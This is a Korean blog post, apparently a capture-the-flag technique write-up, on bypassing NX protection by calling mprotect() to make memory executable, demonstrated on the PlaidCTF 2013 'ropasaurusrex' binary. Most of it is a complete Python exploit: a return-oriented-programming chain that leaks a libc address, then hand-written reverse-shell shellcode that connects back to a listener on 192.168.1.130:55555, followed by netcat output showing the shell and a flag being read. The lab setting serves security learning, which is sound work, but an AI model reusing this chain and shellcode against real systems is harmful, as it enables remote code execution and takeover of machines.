티스토리 뷰
mprotect()의 원형
int mprotect(void *addr, size_t len, int prot);
원래 일반적인 ROP기법을 써서 system() 함수를 실행시키는 방법을 주로
사용했었다.
그런데 NX-Bit가 걸려있어도 mprotect() 함수를 실행시켜서 Shellcode를 실행시킬 수
있다고 한다.
mprotect()함수는 주어진 메모리 영역의 권한을 바꿀 수 있도록 해준다.
그렇기 때문에 prot 인자에 7을 주게 되면 RWX권한이 모두 들어가게 된다.
+ 또한 주의할 점은 void *addr 부분이 0x1000의 배수가 되어야 한다고 한다.
+ 사용한 Binary는 예전에 포스팅 했었던 PlaidCTF rop... 이다.
http://err0rless313.tistory.com/entry/Plaid-CTF-2013-ropasaurusrex
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 | #!/usr/bin/env python #-*-coding:utf8-*- from socket import * from struct import pack, unpack IP = "192.168.1.148" PORT = 1025 def sockSet(i, p): s = socket(AF_INET, SOCK_STREAM) s.connect((i, p)) return s p = lambda x : pack("<L", x) up = lambda x : unpack("<L", x)[0] con = lambda s, i, p : s.connect((i, p)) s = sockSet(IP, PORT) ########################################### shellcode = ( "\x68" "\xC0\xA8\x01\x82" # IP ADDRESS "\x5E\x66\x68" "\xD9\x03" # PORT NUMBER "\x5F\x6A\x66\x58\x99\x6A\x01\x5B\x52\x53\x6A\x02" "\x89\xE1\xCD\x80\x93\x59\xB0\x3F\xCD\x80\x49\x79" "\xF9\xB0\x66\x56\x66\x57\x66\x6A\x02\x89\xE1\x6A" "\x10\x51\x53\x89\xE1\xCD\x80\xB0\x0B\x52\x68\x2F" "\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53" "\xEB\xCE" ) write_plt = p(0x0804830c) write_got = p(0x08049614) read_plt = p(0x0804832c) pop3ret = p(0x080484B6) dataSec = p(0x08049000) offset = 0x0000C480 payload = "" payload += "\x90" * 140 payload += write_plt payload += pop3ret payload += p(0x01) payload += write_got payload += p(0xff) payload += read_plt payload += pop3ret payload += p(0x00) payload += dataSec payload += p(0xff) payload += read_plt payload += pop3ret payload += p(0x00) payload += write_got payload += p(0x04) payload += write_plt payload += dataSec payload += dataSec payload += p(0xff) payload += p(0x07) s.send(payload + "\n") write_libc = up(s.recv(1024)[:4]) mprotect_libc = write_libc + offset print "[*] write@libc : " + hex(write_libc) print "[*] mprotect@libc : " + hex(mprotect_libc) s.send(shellcode + "\n") s.send(p(mprotect_libc) + "\n") | cs |
1 2 3 4 5 6 | root@Kali ~/s/e/ropasaurusrex# nc -lvp 55555 listening on [any] 55555 ... 192.168.1.148: inverse host lookup failed: Unknown server error : ... connect to [192.168.1.130] from (UNKNOWN) [192.168.1.148] 57136 cat /root/sys_hack/pCTF/key flag is {you_cant_stop_the_ropasaurusrex} | cs |
'Pwnable > Technique' 카테고리의 다른 글
| SigReturn Oriented Programming - 32bit (0) | 2015.02.14 |
|---|---|
| 문제풀이로 보는 Integer Overflow 기법 (0) | 2015.02.01 |
| Bypass NX-Bit And ASCII-Armor Python 익스플로잇 (3) | 2014.11.10 |
| Bypass NX-Bit and ASCII-Armor (15) | 2014.10.26 |
| FSB를 이용한 GOT_OVERWRITE (0) | 2014.10.02 |
댓글